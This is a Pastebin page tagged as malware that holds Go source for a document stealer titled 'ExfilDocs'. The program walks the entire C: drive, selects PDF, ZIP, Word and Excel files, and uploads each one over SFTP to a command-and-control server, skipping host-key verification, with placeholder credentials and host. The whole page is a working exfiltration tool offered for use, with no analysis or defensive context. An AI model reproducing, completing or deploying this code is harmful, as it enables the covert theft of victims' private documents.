Advertisement
FlyFar

ExfilDocs (Go Malware) - Searches drive for specific file extensions + uploads files to C2 via SSH

Jul 23rd, 2023
1,388
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Go 2.38 KB | Cybersecurity | 0 0
  1. /* What do I do?
  2. I:
  3. - Search drive for specific file extensions
  4. - Upload files to C2 via SSH
  5. */
  6. package main
  7.  
  8. import (
  9.     "fmt"
  10.     "os"
  11.     "time"
  12.     "path"
  13.     "log"
  14.     "path/filepath"
  15.     "github.com/pkg/sftp"
  16.     "golang.org/x/crypto/ssh"
  17.     // "strings"
  18. )
  19.  
  20. func run() ([]string, error) {
  21.     searchDir := `C:\\`
  22.     fileList := make([]string, 0)
  23.     e := filepath.Walk(searchDir, func(path string, f os.FileInfo, err error) error {
  24.         fileList = append(fileList, path)
  25.         return nil
  26.     })
  27.    
  28.     if e != nil {
  29.         fmt.Println(e)
  30.         // panic(e)
  31.     }
  32.  
  33.     for _, file := range fileList {
  34.         CheckExtension(file)
  35.        
  36.     }
  37.  
  38.     return fileList, nil
  39. }
  40.  
  41. func CheckExtension(file string){
  42.     extension := filepath.Ext(file)
  43.     if (extension == ".pdf") || (extension == ".zip") ||  (extension == ".doc") || (extension == ".docx") || (extension == ".xls") || (extension == ".xlsx") {
  44.         fmt.Println(file)
  45.         uploadfile(file)
  46.         //file upload
  47.     }
  48. }
  49.  
  50.  
  51. func main() {
  52.     run()
  53. }
  54.  
  55. func connect(user, password, host string, port int) (*sftp.Client, error) {
  56.  var (
  57.  auth   []ssh.AuthMethod
  58.  addr   string
  59.  clientConfig *ssh.ClientConfig
  60.  sshClient *ssh.Client
  61.  sftpClient *sftp.Client
  62.  err   error
  63.  )
  64.  // get auth method
  65.  auth = make([]ssh.AuthMethod, 0)
  66.  auth = append(auth, ssh.Password(password))
  67.  
  68.  clientConfig = &ssh.ClientConfig{
  69.  User: user,
  70.  HostKeyCallback: ssh.InsecureIgnoreHostKey(),
  71.  Auth: auth,
  72.  Timeout: 30 * time.Second,
  73.  }
  74.  
  75.  addr = fmt.Sprintf("%s:%d", host, port)
  76.  
  77.  if sshClient, err = ssh.Dial("tcp", addr, clientConfig); err != nil {
  78.  return nil, err
  79.  }
  80.  if sftpClient, err = sftp.NewClient(sshClient); err != nil {
  81.  return nil, err
  82.  }
  83.  
  84.  return sftpClient, nil
  85. }
  86.  
  87. func uploadfile(file string){
  88.  var (
  89.  err  error
  90.  sftpClient *sftp.Client
  91.  )
  92.  
  93.  
  94.  sftpClient, err = connect("username", "password", "server", 22)
  95.  if err != nil {
  96.  log.Println(err)
  97.  }
  98.  defer sftpClient.Close()
  99.  var localFilePath = file
  100.  var remoteDir = "/tmp/"
  101.  srcFile, err := os.Open(localFilePath)
  102.  if err != nil {
  103.  log.Println(err)
  104.  }
  105.  defer srcFile.Close()
  106.  
  107.  var remoteFileName = path.Base(localFilePath)
  108.  dstFile, err := sftpClient.Create(path.Join(remoteDir, remoteFileName))
  109.  if err != nil {
  110.  log.Println(err)
  111.  }
  112.  defer dstFile.Close()
  113.  
  114.  buf := make([]byte, 1024)
  115.  for {
  116.  n, _ := srcFile.Read(buf)
  117.  if n == 0 {
  118.   break
  119.  }
  120.  dstFile.Write(buf)
  121.  }
  122.  
  123.  fmt.Println("copy file to remote server finished!")
  124. }
Tags: malware ssh go c2
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement